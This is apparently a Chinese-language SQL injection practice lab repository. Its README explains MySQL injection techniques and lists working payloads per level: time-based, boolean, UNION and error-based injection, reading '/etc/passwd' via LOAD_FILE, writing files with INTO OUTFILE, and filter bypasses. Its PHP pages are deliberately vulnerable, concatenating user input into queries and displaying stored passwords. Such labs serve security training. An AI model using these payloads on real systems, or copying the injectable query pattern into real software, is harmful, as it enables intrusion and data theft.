├── README.md
├── login.php
├── setup-db.php
├── sql-1.php
├── sql-2.php
├── sql-3.php
├── sql-4.php
├── sql-5.php
├── sql-6.php
├── sql-7.php
├── sql-8.php
└── sql-connect.php
/README.md:
--------------------------------------------------------------------------------
1 | #SQL—Injection
2 | 应用程序在向后台数据库传递SQLc查询时,如果为攻击者提供了影响该查询的能力,就会引起sql注入。简而言之就是程序代码在编写的时候没有对用户可控的变量进行合适的判断d和处理导致不可信数据被作为命令或是数据查询的一部分发送到用户客户端,导致漏洞的发生。
3 | ##Mysql注入
4 | ###Mysql数据库版本
5 | - show version(); < 5.0 没有information_schema数据库;
6 | - show version(); > 5.0 有内置information_schema数据库,可以快速查找表明;
7 | - show version(); > 5.5 有内置information_schema数据库和performance_schema数据库(用于收集数据库服务器性能参数);
8 |
9 | ###注释符
10 | - `#` `/*` `-- -` `;%00`
11 | - 值得注意:在Accsee数据库中没有注释符的存在,但是在一定条件下可以使用%00来代替注释符。
12 |
13 | ###注入方式
14 | - inband,利用攻击者和存在漏洞的wen程序之间现有的f通信方式来进行sql注入并提取数据,Union注入、报错注入(error-base);
15 | - inference,通过传入不同的参数值来观察web程序表现的差异性来进行sql注入并提取数据,布尔值注入(bool)、时间注入(time-base);
16 | - Out-of-inband,当现有的通信渠道不能提取数据d时,我们可以利用其他渠道来尝试提取数据,如e-mail、HTTP/DNS、文件系统;
17 |
18 | ###Mysql 读写文件
19 | - LOAD_FILE()
20 | - SELECT LOAD_FILE('/etc/passwd');
21 | - Mysqlyd用户必须有文件读取的权利;文件大小要小于max_allowed_packet;
22 | - INTO OUTFILE()
23 | - SELECT '' INTO FILE '/var/www/1.php';
24 | - INTO OUTFILE不能覆盖已经存在的文件;
25 |
26 | ###常用函数
27 | - `@@VERSION()` `VERSION()` `current_user` `database()` `@@HOSTNAME`
28 |
29 | ##SQL
30 | - [SQL-1](#sql-1)
31 | - [SQL-2](#sql-2)
32 | - [SQl-3](#sql-3)
33 | - [SQl-4](#sql-4)
34 | - [SQL-5](#sql-5)
35 | - [SQl-6](#sql-6)
36 | - [SQl-7](#sql-7)
37 | - [SQl-8](#sql-8)
38 |
39 |
40 | ##SQL-1
41 | ###mysql_query
42 | - `SELECT * FROM users WHERE id=1 LIMIT 0,1;`
43 | ###Payload
44 | - time-based blind
45 | - `id=1 AND SLEEP(5) `
46 | - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`
47 | - boolean-based blind
48 | - `id=1 AND 6036=6036`
49 | - UNION query
50 | - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--`
51 |
52 | ##SQL-2
53 | 对比于SQL-1的直接传值$id,SQL-2中在SQL-1注入Payload的基础上需要对y单引号`'`进行闭合;
54 | ###mysql_query
55 | - `SELECT * FROM users WHERE id='$id' LIMIT 0,1;`
56 | ###PayLoad
57 | - time-based blind
58 | - `id=1' AND SLEEP(5) AND 'sql'='sql`
59 | - `id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa) and 'Kevinsa'='Kevinsa`
60 | - boolean-based blind
61 | - `id=1' AND 6036=6036 AND 'Drgh'='Drgh`
62 | - UNION query
63 | - `id=-3563' UNION ALL SELECT NULL,NULL,CONCAT()-- Kevinsa'`
64 |
65 | ##SQL-3
66 | ###mysql_query
67 | - `SELECT * FROM users WHERE id=($id) LIMIT 0,1;`
68 | ###Payload
69 | - time-based blind
70 | - `?id=1) AND SLEEP(5) AND (1=1# `
71 | - boolen-based blind
72 | - `?id=1) AND 1378=1379 AND ('ARzY'='ARzY'`
73 |
74 | ##SQL-4
75 | 可以看到SQL-4与SQL-1是相类似的,在不需要闭合任何符合的情况下就可以进行SQL注入,但是在SQL-4中值得一提的是,SQL-4中开启了`mysql_error();`,r所以我们可以利用报错注入的方式来提取数据。
76 | ###mysql_query
77 | - ```
78 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
79 | mysql_query($sql_query);
80 | echo mysql_error;
81 | ```
82 |
83 | ###Payload
84 | - error-based blind
85 | - `?id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)`
86 | - 主键重复性报错,floor(rand(0)*2)、count(*)、group by,报错方式的原理是:使用rand()查询时,由于group by的存在floor(rand(0)*2)会被执行一次,当x虚拟表不存在时,插入虚拟表会被再执行一次,而报错正是因为floor(rand(0)*2)的确定性011;文章:Wooyun知识库-Mysql报错注入原理分析(count()、rand()、group by)
87 | - `id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))`
88 | - extractvalue是mysql5.1提供的内置XML文件解析和修改函数,函数语法为extratvalue(XML_document,XPath_string),其中的XML_document是string格式,而当我们传入一个数值时,extractvalue()函数会产生报错;
89 | - `id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))`
90 | - extractvalue、updatexml都属于xpath语法错误进行报错注入,version>5.1.5,提供的两个XML查询和修改哈苏宁沪,extractvalue负责在xml文档中按照xpath语法查询节点内容,而updatexml负责修改查询到的内容。extractvalue、updatexml函数的第二个参数都是要去符合xpath语法的字符串,如果我们传入数字就能产生报错。updatexml同样是mysql5.1中提供的内置xml文件解析和修改函数,函数语法为updatexml(XML_document,XPath_string,new_value),其中的XML_document是string格式,而当我们传入一个数值时,updatexml()函数会产生报错;
91 | ###About
92 | - version > 5.0.12,我们可以利用name_const()函数的重复产生报错来提取数据。select * from(select name_const(version()),1),name_const(version(),1);
93 | - 利用整形溢出进行报错注入提取数据,5.5.5 > version > 5.5可以返回信息,同时报错信息也是有长度限制的,#define ERRMSGSIZE (512)
94 |
95 | ##SQL-5
96 | 虽然SQL-5的csql查询方式和SQL-1一样,但是php代码中没有对结果的输出点,而且注入布尔值判断也不影响页面正常输出任何内容,所以我们只能利用time-based blind。
97 | ###mysql_query
98 | - `SELECT * FROM users WHERE id='$id' LIMIT 0,1;
99 | /* echo mysql_query(); */`
100 | ###Payload
101 | - time-based blind
102 | - `id=1 AND SLEEP(5) `
103 | - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`
104 |
105 |
106 | ##SQL-6
107 | SQL-6对比与SQL-1多了一层粗糙的过滤,`function sqlentities()`以黑名单的方式对id参数值进行过滤。
108 | ###mysql_query
109 | - ```
110 | function sqlentities($var) {
111 | $var = str_replace("select"," ",$var);
112 | $var = str_replace("sleep"," ",$var);
113 | $var = str_replace("and"," ",$var);
114 | $var = str_replace("from"," ",$var);
115 | $var = str_replace("where"," ",$var);
116 | $var = str_replace("union"," ",$var);
117 |
118 | return $var;
119 | }
120 |
121 | ```
122 | ###Payload
123 | 最简单的方式,我们一大小写混淆来绕过过滤
124 | - time-based blind
125 | - `id=1 AND SLEEP(5) `
126 | - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`
127 | - boolean-based blind
128 | - `id=1 AND 6036=6036`
129 | - UNION query
130 | - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--`
131 |
132 | ##SQL-7
133 | 相对于SQL-6,SQL-7匹配为大小写匹配,我们不能用大小写混淆来绕过过滤。
134 | ###mysql_quey
135 | - ```
136 | function sqlentities($var) {
137 | $var = preg_replace('/(select|where|sleep|and|from|union)/i',"",$var);
138 | return $var;
139 | }
140 | }
141 | ```
142 |
143 | ###Payload
144 | - time-based blind
145 | - `id=1 ANandD SLandEEP(5) `
146 | - `id=1 AND (SELEandCT * FandROM (SandELECT(SLandEEP(5)))Kevinsa)`
147 | - boolean-based blind
148 | - `id=1 ANandD 6036=6036`
149 | - UNION query
150 | - `id=-3563 UNandION ALL SELECandT NULL,NULL,CONCAT()--`
151 |
152 | ##SQL-8
153 | ###mysql_query
154 | - ```
155 | $name=$_POST['username'];
156 | $password=$_POST['password'];
157 | ```
158 |
--------------------------------------------------------------------------------
/login.php:
--------------------------------------------------------------------------------
1 | ";
17 | $username=$_POST['username'];
18 | $password=$_POST['password'];
19 | if($name == "")
20 | {
21 | echo "请填写用户名
";
22 | echo"";
24 | }
25 | elseif($password == "")
26 | {
27 | //echo "请填写密码
返回";
28 | echo"";
29 | }
30 | else
31 | {
32 | $colum=collect_data();
33 | if(($colum['username'] == $username) && ($colum['password'] == $password))
34 | {
35 | //echo "验证成功!
";
36 | echo"";
37 | }
38 | else
39 | //echo "密码错误
";
40 | echo"";
41 | //echo "返回";
42 | }
43 | ?>
44 |
--------------------------------------------------------------------------------
/setup-db.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
23 |
24 |
25 |
31 |
32 |
33 |
35 | ";}
49 | else {
50 | echo mysql_error();
51 | echo "
";}
52 | $sql2 = "CREATE DATABASE `challenge` CHARACTER SET `gbk`";
53 | if(mysql_query($sql2)) {
54 | echo "成功创建数据库";
55 | echo "
";}
56 | else {
57 | echo mysql_error();
58 | echo "
";}
59 | $sql3 = "CREATE TABLE challenge.users (id int(3) NOT NULL AUTO_INCREMENT, username varchar(20) NOT NULL, password varchar(20) NOT NULL, PRIMARY KEY (id))";
60 | if(mysql_query($sql3)) {
61 | echo "成功写入字段";
62 | echo "
";}
63 | else {
64 | echo mysql_error();
65 | echo "
";}
66 | $sql4="INSERT INTO challenge.users (id, username, password) VALUES ('1', 'kevin', 'Kevin'), ('2', 'angle', 'angle'''), ('3', 'Miss', 'miss')";
67 | if(mysql_query($sql4)) {
68 | echo "成功写入数据";
69 | echo "
";}
70 | else {
71 | echo mysql_error();
72 | echo "
";}
73 | $sql5 = "CREATE TABLE challenge.emails
74 | (
75 | id int(3)NOT NULL AUTO_INCREMENT,
76 | email_id varchar(30) NOT NULL,
77 | PRIMARY KEY (id)
78 | )";
79 | if(mysql_query($sql5)) {
80 | echo "成功创建新的数据表";
81 | echo "
";}
82 | else {
83 | echo mysql_error();
84 | echo "
";}
85 | $sql6="INSERT INTO `challenge`.`emails` (id, email_id) VALUES ('1', 'Dumb@dhakkan.com'), ('2', 'Angel@iloveu.com'), ('3', 'Dummy@dhakkan.local'), ('4', 'secure@dhakkan.local'), ('5', 'stupid@dhakkan.local'), ('6', 'superman@dhakkan.local'), ('7', 'batman@dhakkan.local'), ('8', 'admin@dhakkan.com')";
86 | if(mysql_query($sql6)) {
87 | echo "成功写入数据";
88 | echo "
";}
89 | else {
90 | echo mysql_error();
91 | echo "
";}
92 |
93 | ?>
94 |
95 |
96 |
97 |
100 |
101 |
102 |
103 |
104 |
--------------------------------------------------------------------------------
/sql-1.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
59 | if(isset($_GET['id'])) {
60 | $id = $_GET['id'];
61 | echo "传入的值:id=" .$id;
62 | echo "
";
63 |
64 |
65 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
66 | print_r("$sql_query");
67 | echo "
";
68 | $result = mysql_query($sql_query);
69 |
70 | $arr = mysql_fetch_array($result);
71 |
72 | if ($arr) {
73 | echo "
";
74 | echo "
";
75 | echo "Username: " .$arr['username'];
76 | echo "
";
77 | echo "Password: " .$arr['password'];
78 | echo "
";}
79 | else {
80 | echo "
";
81 | echo "sql查询失败";}
82 | echo "
";
83 | }
84 | ?>
85 |
86 |
87 |
88 |
89 |
90 |
93 |
--------------------------------------------------------------------------------
/sql-2.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
48 |
49 |
50 |
52 | ";
59 | if(isset($_GET['id'])) {
60 | $id = $_GET['id'];
61 | echo "传入的值:id=" .$id;
62 | echo "
";
63 |
64 |
65 | $sql_query="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
66 | print_r("$sql_query");
67 | echo "
";
68 | $result = mysql_query($sql_query);
69 | $arr = mysql_fetch_array($result);
70 |
71 | if ($arr) {
72 | echo "
";
73 | echo "
";
74 | echo "Username: " .$arr['username'];
75 | echo "
";
76 | echo "Password: " .$arr['password'];
77 | echo "
";}
78 | else {
79 | echo "sql查询失败";}
80 | echo "
";
81 | }
82 | ?>
83 |
84 |
85 |
86 |
87 |
88 |
91 |
--------------------------------------------------------------------------------
/sql-3.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
57 | echo "
";
58 | if(isset($_GET['id'])) {
59 | $id = $_GET['id'];
60 | echo "传入的值:id=" .$id;
61 | echo "
";
62 |
63 |
64 | $sql_query="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
65 | print_r("$sql_query");
66 | $result = mysql_query($sql_query);
67 | $arr = mysql_fetch_array($result);
68 |
69 | if ($arr) {
70 | echo "
";
71 | echo "
";
72 | echo "Username: " .$arr['username'];
73 | echo "
";
74 | echo "Password: " .$arr['password'];
75 | echo "
";}
76 | else {
77 | echo "
";
78 | echo "sql查询失败";}
79 | echo "
";
80 | }
81 | ?>
82 |
83 |
84 |
86 |
87 |
90 |
--------------------------------------------------------------------------------
/sql-4.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
59 | if(isset($_GET['id'])) {
60 | $id = $_GET['id'];
61 | echo "传入的值:id=" .$id;
62 | echo "
";
63 |
64 |
65 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
66 | print_r("$sql_query");
67 | echo "
";
68 | $result = mysql_query($sql_query);
69 |
70 | $arr = mysql_fetch_array($result);
71 |
72 | if ($arr) {
73 | echo "
";
74 | echo "
";
75 | echo "Username: " .$arr['username'];
76 | echo "
";
77 | echo "Password: " .$arr['password'];
78 | echo "
";}
79 | else {
80 | echo "
";
81 | echo mysql_error();}
82 | echo "
";
83 | }
84 | ?>
85 |
86 |
87 |
88 |
89 |
90 |
93 |
--------------------------------------------------------------------------------
/sql-5.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
59 | if(isset($_GET['id'])) {
60 | $id = $_GET['id'];
61 | echo "传入的值:id=" .$id;
62 | echo "
";
63 |
64 |
65 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
66 | print_r("$sql_query");
67 | echo "
";
68 | $result = mysql_query($sql_query);
69 |
70 | /*$arr = mysql_fetch_array($result);
71 |
72 | if ($arr) {
73 | echo "
";
74 | echo "
";
75 | echo "Username: " .$arr['username'];
76 | echo "
";
77 | echo "Password: " .$arr['password'];
78 | echo "
";}
79 | else {
80 | echo "
";
81 | echo mysql_error();}*/
82 | echo "
";
83 | }
84 | ?>
85 |
86 |
87 |
88 |
89 |
90 |
93 |
--------------------------------------------------------------------------------
/sql-6.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
71 | if(isset($_GET['id'])) {
72 | $id = sqlentities($_GET['id']);
73 | echo "传入的值:id=" .$id;
74 | echo "
";
75 |
76 |
77 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
78 | print_r("$sql_query");
79 | echo "
";
80 | $result = mysql_query($sql_query);
81 |
82 | $arr = mysql_fetch_array($result);
83 |
84 | if ($arr) {
85 | echo "
";
86 | echo "
";
87 | echo "Username: " .$arr['username'];
88 | echo "
";
89 | echo "Password: " .$arr['password'];
90 | echo "
";}
91 | else {
92 | echo "
";
93 | echo "sql查询失败";}
94 | echo "
";
95 | }
96 | ?>
97 |
98 |
99 |
100 |
101 |
102 |
105 |
--------------------------------------------------------------------------------
/sql-7.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
22 |
23 |
24 |
47 |
48 |
49 |
51 | ";
80 | if(isset($_GET['id'])) {
81 | $id = sqlentities($_GET['id']);
82 | echo "传入的值:id=" .$id;
83 | echo "
";
84 |
85 |
86 | $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
87 | print_r("$sql_query");
88 | echo "
";
89 | $result = mysql_query($sql_query);
90 |
91 | $arr = mysql_fetch_array($result);
92 |
93 | if ($arr) {
94 | echo "
";
95 | echo "
";
96 | echo "Username: " .$arr['username'];
97 | echo "
";
98 | echo "Password: " .$arr['password'];
99 | echo "
";}
100 | else {
101 | echo "
";
102 | echo "sql查询失败";}
103 | echo "
";
104 | }
105 | ?>
106 |
107 |
108 |
109 |
110 |
111 |
114 |
--------------------------------------------------------------------------------
/sql-8.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | xss-1
8 |
9 |
10 |
11 |
12 |
13 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
128 |
129 |
130 |
152 |
153 |
154 |
181 |
182 |
183 |
184 |
185 |
186 |
189 |
--------------------------------------------------------------------------------
/sql-connect.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------